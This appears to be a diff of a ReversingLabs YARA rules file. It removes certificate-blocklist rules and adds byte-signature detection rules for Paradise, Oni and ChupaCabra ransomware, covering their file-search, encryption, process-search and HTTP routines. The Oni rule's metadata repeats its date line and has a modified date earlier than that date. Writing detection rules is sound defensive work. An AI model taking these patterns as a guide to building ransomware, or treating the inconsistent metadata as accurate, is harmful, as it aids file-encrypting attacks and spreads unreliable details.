?? ?? + ?? ?? 6A ?? FF 35 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? + 50 FF 35 ?? ?? ?? ?? FF D3 6A ?? FF 35 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 8B 48 ?? 51 + FF 35 ?? ?? ?? ?? FF D3 8B F8 8D 85 ?? ?? ?? ?? 50 FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? + ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 40 ?? 50 6A ?? FF 95 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A + ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? + ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? + FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digital Capital Management Ireland Limited" and (pe.signatures[i].serial=="00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" or pe.signatures[i].serial=="da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79") and 1600244736<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($disable_fw_and_delete_shadow_volumes) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_F8C2E08438Bb0E9Adc955E4B493E5821 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Paradise : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Paradise ransomware." author = "ReversingLabs" - id = "65297530-2482-5773-8914-461fb56cb41d" - date = "2023-11-08" - modified = "2023-11-08" + id = "9a92a05c-5f26-59ed-9934-a24bb7c31d8d" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5138-L5156" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5dbe554032c945c46ffd61ef1e0deb59d396a70dd63994bf44c65d849ec8220a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Paradise.yara#L1-L81" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fc029bee999ec72416ac91d8386d4d270070035ad078bcab1dec11eea032c10b" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Paradise" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DocsGen Software Solutions Inc." and (pe.signatures[i].serial=="00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" or pe.signatures[i].serial=="f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21") and 1599523200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_70E1Ebd170Db8102D8C28E58392E5632 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "e3b0f68c-8cc9-5275-988a-8d955ea25a47" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5158-L5174" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e1738eddc1da0876a373ee7f35bff155d56c1b98a23cb117c0e7a966f8fa3c92" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $search_files = { + 53 56 57 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 89 75 ?? 85 F6 + 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 56 FF + D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? + ?? ?? 83 65 ?? ?? 8B 45 ?? 8B 74 85 ?? 8D 95 ?? ?? ?? ?? 85 F6 74 ?? 0F B7 02 83 F8 + ?? 72 ?? 8D 48 ?? 83 F8 ?? 76 ?? 8B C8 0F B7 06 83 F8 ?? 72 ?? 83 F8 ?? 77 ?? 83 C0 + ?? 3B C8 0F B7 02 75 ?? 66 85 C0 74 ?? 83 C2 ?? 83 C6 ?? EB ?? 0F B7 02 EB ?? 66 3B + 06 1B C0 83 E0 ?? 40 EB ?? 33 C0 85 C0 0F 84 ?? ?? ?? ?? FF 45 ?? 83 7D ?? ?? 72 ?? + 8B 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 56 FF D7 83 C4 ?? F6 85 ?? + ?? ?? ?? ?? 74 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 80 3D ?? ?? ?? ?? ?? 74 ?? BA + ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? EB ?? F6 85 ?? ?? ?? + ?? ?? 74 ?? A1 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 85 C0 75 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? + ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 + ?? ?? ?? ?? 53 FF 75 ?? FF D7 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? + ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3 + } + $encrypt_files_p1 = { + 56 57 6A ?? BE ?? ?? ?? ?? 5F E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 56 E8 ?? ?? + ?? ?? 83 C4 ?? 83 C6 ?? 4F 75 ?? 33 F6 39 75 ?? 74 ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 0F + B7 88 ?? ?? ?? ?? 56 56 51 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 59 89 4D + ?? 33 C0 8A 90 ?? ?? ?? ?? 88 90 ?? ?? ?? ?? 3B C6 75 ?? 33 C0 40 3B C1 72 ?? 68 ?? + ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 5F 5E C9 C3 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 + } + $encrypt_files_p2 = { + 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB + 53 53 8D 44 24 ?? 50 89 5C 24 ?? FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 44 + 24 ?? 50 FF D6 85 C0 75 ?? 89 5C 24 ?? 39 5C 24 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 0F B6 80 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF + 74 24 ?? E8 ?? ?? ?? ?? 59 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 53 53 + 53 53 C6 05 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 88 1D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 59 33 C0 88 98 ?? ?? ?? ?? 3B C3 75 ?? 33 C0 40 83 F8 ?? 72 ?? 6A ?? 5E + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 + ?? 6A ?? 53 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 4E 75 ?? 8B 3D ?? + ?? ?? ?? 81 C7 ?? ?? ?? ?? 6A ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 75 ?? 57 E8 + ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 + } + $http_remote_connection = { + 53 56 57 FF 75 ?? 33 FF 8D 75 ?? 89 7D ?? E8 ?? ?? ?? ?? 59 89 7D ?? 57 57 57 FF 75 + ?? 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 FF 75 ?? + FF 75 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? 57 + 0F 95 C1 B8 ?? ?? ?? ?? 49 23 C8 03 C8 51 57 57 57 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 8B D8 3B DF 74 ?? 57 57 57 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 + F6 57 57 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C6 3B C7 + 75 ?? 89 7D ?? EB ?? 50 39 7D ?? 75 ?? E8 ?? ?? ?? ?? 59 EB ?? FF 75 ?? 6A ?? FF 15 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 C6 50 53 + FF 15 ?? ?? ?? ?? 03 75 ?? 39 7D ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? + ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 7D ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 + ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B + C9 C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Equal Cash Technologies Limited" and pe.signatures[i].serial=="70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" and 1599264000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $search_files and $http_remote_connection and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_09C89De6F64A7Fdf657E69353C5Fdd44 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_ONI : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Oni ransomware." author = "ReversingLabs" - id = "f86eafb5-ec59-58c5-b5f9-01a6704fb555" - date = "2023-11-08" - modified = "2023-11-08" + id = "9190aee2-1119-546e-82ca-a7aba44a9d7f" + date = "2024-09-29" + date = "2024-09-29" + modified = "2020-12-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5176-L5192" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1cb57cd68cda91754307d2e4d94ea011975bbfff0f15134081a5aa11870b0db1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Oni.yara#L1-L82" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "685abf5a5edba5bae19faaf6521ce617370cdab1404fe84d846e82a60182dfff" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EXON RENTAL SP Z O O" and pe.signatures[i].serial=="09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" and 1601337601<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Ffff2Ce862378B26440Df49Ca9175B70 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "d5d1e84d-328f-53ac-adb6-3824fa77a47d" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5194-L5212" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8ed7b0643b07ce4954f570157e1534ee1ed647717cce00fe7f2b572c9b5d0042" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? + 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? + 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? + ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8B D4 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 + ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 90 8A 01 41 84 + C0 75 ?? 2B CE 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? + ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? + ?? ?? C7 41 ?? ?? ?? ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 + ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? + 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 + ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 + ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 + ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 68 + ?? ?? ?? ?? 6A ?? 33 F6 89 55 ?? 56 56 50 89 4D ?? 89 75 ?? FF D7 85 C0 75 ?? 68 ?? + ?? ?? ?? 6A ?? 50 50 8D 45 ?? 50 FF D7 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8D 45 ?? + 89 75 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 + DB 74 ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? 53 57 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? + 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 89 01 53 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? + 5B 8B 4D ?? 8B C6 5F 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $search_processes = { + 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 + ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? + ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 44 24 ?? ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? C7 05 ?? + ?? ?? ?? ?? ?? ?? ?? 50 8D 44 24 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 05 ?? ?? ?? + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 83 EE ?? 4F 83 7E + ?? ?? 72 ?? 8B 1E 8B CE 56 E8 ?? ?? ?? ?? 8B 46 ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C3 ?? + 75 ?? 8B 43 ?? 3B C3 73 ?? 2B D8 83 FB ?? 72 ?? 83 FB ?? 77 ?? 8B D8 53 E8 ?? ?? ?? + ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? + 8B C6 8B CE C6 00 ?? E8 ?? ?? ?? ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 5F 5E 5B 8B E5 5D C3 E8 ?? ?? ?? ?? CC CC CC CC CC B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "F & A.TIM d.o.o." and (pe.signatures[i].serial=="00:ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" or pe.signatures[i].serial=="ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70") and 1576195200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_processes) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3223B4616C2687C04865Bee8321726A8 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Chupacabra : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects ChupaCabra ransomware." author = "ReversingLabs" - id = "089aae56-4f46-563c-800a-dbf57db2bde6" - date = "2023-11-08" - modified = "2023-11-08" + id = "e44a101d-53c3-51f2-84ca-f6a5858c169b" + date = "2021-10-12" + modified = "2021-10-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5214-L5230" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fcb0a14866b3612c5ec5a7db7a3333e20a4605695b3d019eef84de85d7b3ea4d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.ChupaCabra.yara#L1-L90" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7f247778e0bd8057670abf42b2d1011ebae891ffcb21ebad50060f9a7986bf93" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "ChupaCabra" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTUNE STAR TRADING, INC." and pe.signatures[i].serial=="32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" and 1601337600<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7709D2Df39E9A4F7Db2F3Cbc29B49743 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "7227daa3-453d-5bb8-804c-8a97cd0d81c6" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5232-L5248" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c9ade45e0f9fb737a08ffa94d1fff89471a1cbcbacc139730fab88e382226d0b" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 28 + ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 14 0A 14 0B 7E ?? ?? ?? ?? 7E ?? ?? + ?? ?? 73 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 73 ?? ?? ?? ?? 13 ?? 73 ?? + ?? ?? ?? 0A 06 08 06 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 11 ?? 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 + ?? 11 ?? 16 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0B DE + ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? + 11 ?? 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 07 2A + } + $encrypt_files_p2 = { + 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 0A 02 06 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? + ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? ?? 8D ?? ?? + ?? ?? 0B 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? + ?? ?? ?? 0D 09 07 09 8E 69 28 ?? ?? ?? ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 19 28 + ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? + ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 02 28 + ?? ?? ?? ?? 13 ?? 11 ?? 17 5F 17 33 ?? 11 ?? 17 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? + ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 38 ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? + ?? 8D ?? ?? ?? ?? 13 ?? 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 19 28 + ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F + ?? ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 26 DE ?? + 2A + } + $find_files_p1 = { + 02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 16 0C 2B ?? 06 08 